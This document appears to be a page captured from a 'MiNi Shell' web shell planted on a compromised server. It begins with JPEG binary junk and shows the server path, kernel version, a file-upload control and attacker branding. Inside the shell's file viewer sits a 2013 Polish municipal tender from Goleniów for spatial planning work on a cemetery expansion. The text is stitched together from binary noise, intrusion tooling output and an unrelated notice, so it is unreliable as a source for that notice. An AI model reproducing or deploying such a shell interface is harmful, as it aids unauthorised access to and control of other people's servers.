JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/58194-N-2013.html

<p class="kh_header"><b>Goleniów: Opracowanie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Goleniów  oraz projektu miejscowego planu zagospodarowania przestrzennego na powiększenie cmentarza komunalnego w Goleniowie</b><br>
<b>Numer ogłoszenia: 58194 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Goleniów , Plac Lotników 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4698200, faks 091 4698298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goleniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Goleniów  oraz projektu miejscowego planu zagospodarowania przestrzennego na powiększenie cmentarza komunalnego w Goleniowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Szczegółowy zakres przedmiotu zamówienia dotyczący opracowania zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Goleniów wraz                               z ekofizjografią i prognozą oddziaływania na środowisko obejmuje:
1) Sporządzenie w skali 1:10000 zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Goleniów wraz z prognozą oddziaływania na środowisko, zgodnie                    z harmonogramem rzeczowym prac planistycznych stanowiącym załącznik nr 10 do SIWZ, Uchwałą Rady Miejskiej w Goleniowie Nr XXIV/283/12 z dnia 26 września 2012 r. w sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Goleniów stanowiącą załącznik nr 8 do SIWZ, obowiązującymi przepisami, z uwzględnieniem wymogów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r., Nr 118, poz. 1233) oraz ustawą                    z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Z 2012 r. poz. 647 z późn. zm.).
2) Analizę wniosków dotyczących obszaru wchodzącego w zakres zmiany Studium, sporządzenie wykazu,               
3) Sporządzenie projektu zmiany studium wraz z prognozą oddziaływania na środowisko uwzględniając wnioski dotyczące zmiany Studium ,
4) Udział w posiedzeniach gminnej komisji urbanistyczno-architektonicznej,
5) Uzyskanie od gminnej komisji urbanistyczno-architektonicznej pozytywnej opinii o projekcie zmiany studium,
8) Uzyskanie niezbędnych opinii i uzgodnień projektu zmiany studium zgodnie z art. 11 ust. 6 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym sporządzenie wykazu ,
9) Prezentację koncepcji projektu zmiany studium wraz z prognozą oddziaływania na środowisko władzom Gminy,
10) Wprowadzenie zmian do projektu zmiany studium, wynikających z uzyskanych opinii                    i dokonanych uzgodnień,
12) Udział w dyskusjach publicznych nad przyjętymi rozwiązaniami w projekcie zmiany studium i w prognozie oddziaływania na środowisko,
13) Analizę i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu zmiany studium i prognozy oddziaływania na środowisko,
14) Wprowadzenie zmian w projekcie zmiany studium wynikających z rozpatrzenia ewentualnych uwag,
15) Ewentualne ponowne uzgodnienie projektu zmiany studium z instytucjami i organami                   w niezbędnych zakresach,
16) Przygotowanie projektu uchwały w sprawie uchwalenia zmiany studium wraz z prognozą oddziaływania na środowisko z listą nieuwzględnionych uwag z uzasadnieniem ich nieuwzględnienia,
17) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie         z art. 42 i art. 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji                         o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zmianami)
18) Przekazanie Zamawiającemu kompletnej dokumentacji prac planistycznych dotyczącej zmiany studium wraz z załącznikami i prognozą oddziaływania na środowisko w celu przekazania Wojewodzie.
2. Szczegółowy zakres przedmiotu zamówienia dotyczący opracowania miejscowego planu zagospodarowania przestrzennego terenu przeznaczonego na powiększenie cmentarza komunalnego w Goleniowie wraz z prognozą oddziaływania na środowisko, ekofizjografią, prognozą skutków finansowych uchwalenia planu obejmuje:
1) Sporządzenie w skali 1:1000 - miejscowego planu zagospodarowania przestrzennego terenu     o powierzchni 24 ha obejmującego działkę nr 17/1 oraz części działek nr : 5, 6 i 18/1 położone  w obrębie ewidencyjnym Łozienica wraz z ekofizjografią i prognozą oddziaływania na środowisko, zgodnie z harmonogramem rzeczowym realizacji zamówienia stanowiącym załącznik nr 10 do SIWZ oraz uchwałą Rady Miejskiej w Goleniowie Nr XXIV/284/12 z dnia 26 września 2012 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego Gminy Goleniów w obrębie ewidencyjnym Łozienica                       z przeznaczeniem pod rozbudowę cmentarza komunalnego w Goleniowie stanowiącą  załącznik nr 9 do SIWZ, obowiązującymi przepisami, z uwzględnieniem wymogów określonych                       w Rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie
wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego gminy (Dz. U. Nr 164 z 2003 r., poz. 1587) oraz ustawą z dnia 27 marca 2003 r. o planowaniu                                 i zagospodarowaniu przestrzennym (Dz. U. Z 2012 r. poz. 647  z późn. zm.).
2) Analizę wniosków dotyczących obszaru wchodzącego w zakres  planu,
3) Sporządzenie ekofizjografii i projektu  miejscowego planu zagospodarowania przestrzennego (mpzp) w dwóch wariantach; po wybraniu przez Zamawiającego jednego wariantu sporządzenie prognozy oddziaływania na środowisko,
4) Udział w posiedzeniach gminnej  komisji urbanistyczno-architektonicznej,
5) Uzyskanie od gminnej komisji urbanistyczno-architektonicznej pozytywnej opinii o projekcie  mpzp,
6) Prezentację władzom Gminy projektu mpzp wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych,
7) Sporządzenie prognozy skutków finansowych uchwalenia mpzp,
8) Uzyskanie niezbędnych opinii i uzgodnień do projektu  mpzp, zgodnie z art. 17 pkt. 6 Ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym.
9) Sporządzenie wniosków i uzyskanie zgody na zmianę przeznaczenia gruntów rolnych                      i leśnych na cele nierolnicze i nieleśne,
10) Wprowadzenie zmian do projektu mpzp, wynikających z uzyskanych opinii i dokonanych uzgodnień,
11) Udział w dyskusjach publicznych nad przyjętymi rozwiązaniami w projekcie mpzp                         i w prognozie oddziaływania na środowisko,
12) Analizę i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu  mpzp i prognozy oddziaływania na środowisko,
13) Wprowadzenie zmian w projekcie mpzp wynikających z rozpatrzenia ewentualnych uwag,
14) Ewentualne ponowne uzgodnienie projektu mpzp z instytucjami i organami w niezbędnych zakresach,
15) Przygotowanie projektu uchwały w sprawie uchwalenia  mpzp oraz prognozy oddziaływania na środowisko z listą nieuwzględnionych uwag z uzasadnieniem ich nieuwzględnienia,
16) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie     z art. 42 i art. 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji                       o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zmianami)
17) Przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących mpzp wraz z załącznikami i prognozą oddziaływania na środowisko z uwzględnieniem wymogów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r.                 w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego gminy (Dz. U. Nr 164 z 2003 r., poz. 1587) w celu przekazania Wojewodzie do oceny                           i publikacji.
18) Udział w ewentualnych postępowaniach przed Wojewodą lub Sądem Administracyjnym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych w wysokości nie przekraczającej 30% wartości zamówienia podstawowego. Zamówienia uzupełniające będą polegać na powtórzeniu tego samego rodzaju zamówienia co będące przedmiotem niniejszego zamówienia  SIWZ</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 360.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego art. 22 ustawy Prawo zamówień publicznych Wykonawca musi wykazać, iż będzie dysponować:
a) doświadczeniem polegającym na wykonaniu co najmniej jednego uchwalonego                                  i obowiązującego miejscowego planu zagospodarowania przestrzennego sporządzonego według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu                             i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) - od uchwały    o przystąpieniu do jego sporządzenia - do jego uchwalenia  i opublikowania w dzienniku urzędowym województwa obejmującego obszar miejski  o powierzchni nie mniejszej niż 10 ha     w obszarze miasta lub jeden projekt planu zagospodarowania przestrzennego o przeznaczeniu pod cmentarz.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego art. 22 ustawy Prawo zamówień publicznych Wykonawca musi wykazać, iż będzie dysponować	osobami zdolnymi do wykonania zamówienia:
- co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadającą kwalifikacje do kierowania pracami planistycznymi (głównym projektantem planu). Główny projektant planu winien posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego urbanistów (zgodnie z art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu                         i zagospodarowaniu przestrzennym oraz art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów) lub posiadać równoważne kwalifikacje w rozumieniu przepisów europejskich (dotyczy Wykonawców z obszaru Unii Europejskiej), oraz posiadającą doświadczenie  w wykonaniu, co najmniej jednego uchwalonego i obowiązującego miejscowego planu zagospodarowania przestrzennego sporządzonego według procedur i problematyki określonych w Ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.), - od uchwały o przystąpieniu do jego sporządzenia - do uchwały o jego uchwaleniu i opublikowaniu w dzienniku urzędowym województwa obejmującego obszary miejskie o powierzchni nie mniejszej niż 10 ha  lub jeden projekt planu zagospodarowania przestrzennego o przeznaczeniu pod cmentarz..
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy przygotowany- zgodnie z załącznikiem nr 1 do SIWZ
b)	jeżeli Wykonawca ma zamiar zlecić wykonanie części robót podwykonawcy  to musi wypełnić i załączyć do oferty załącznik nr 7 do SIWZ;
c)	jeżeli Wykonawca ma zamiar korzystać z cudzych zasobów w zakresie dysponowania wiedzą i doświadczeniem  innych podmiotów zobowiązany jest przedstawić pisemne zobowiązanie innego podmiotu udostępniającego Wykonawcy swoją wiedzę i doświadczenie (sporządzone według załącznika nr 11 do SIWZ);
d)	jeżeli Wykonawca ma zamiar korzystać z cudzych zasobów w zakresie dysponowania osobami to ma załączyć do oferty zobowiązanie innego podmiotu oddającego do dyspozycji Wykonawcy osoby na okres ich udziału w wykonywaniu zamówienia - sporządzone według załącznika załącznikiem nr 12 do SIWZ;
e)	dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.




1. Zmiana terminu realizacji przedmiotu umowy
1)	nie uzyskanie przez Wykonawcę niezbędnych do wykonania przedmiotu zamówienia opinii i uzgodnień od instytucji, organów i osób nie będących stronami umowy w terminach umożliwiających prawidłowe wykonanie przedmiotu zamówienia.
2)	zmiany warunków projektowania przez jednostki opiniujące, uzgadniające.
3)	konieczność przeprowadzenia ponownego uzgadniania, opiniowania, wyłożenia                      do publicznego wglądu projektu zmiany studium, zmian prawa lub obowiązujących norm wywołujących konieczność zmiany zakresu lub harmonogramu prac. 
4)	 Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac.
5)	zmiana zakresu usługi spowodowana np. zmiana uchwały o przystąpieniu                                 do opracowania zmiany studium.
6)	wystąpienie okoliczności opisanej w § 6 ust. 7 umowy tj. Zamawiający zastrzega sobie możliwość odbioru każdego z etapów prac w oparciu o niezależną opinię wydaną przez osobę powołaną przez Zamawiającego. 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1-6 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż w o okres trwania tych okoliczności.

2.Zmiana sposobu spełnienia świadczenia:
1. Zmiany osobowe:
- zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się, co najmniej równoważnymi uprawnieniami i kwalifikacjami

3. Pozostałe zmiany
a) zmiana obowiązującej stawki VAT:
-	jeśli  zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę, 
-	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę. 
b) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów, pokój 212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 08:45, miejsce: Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów, pokój 212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com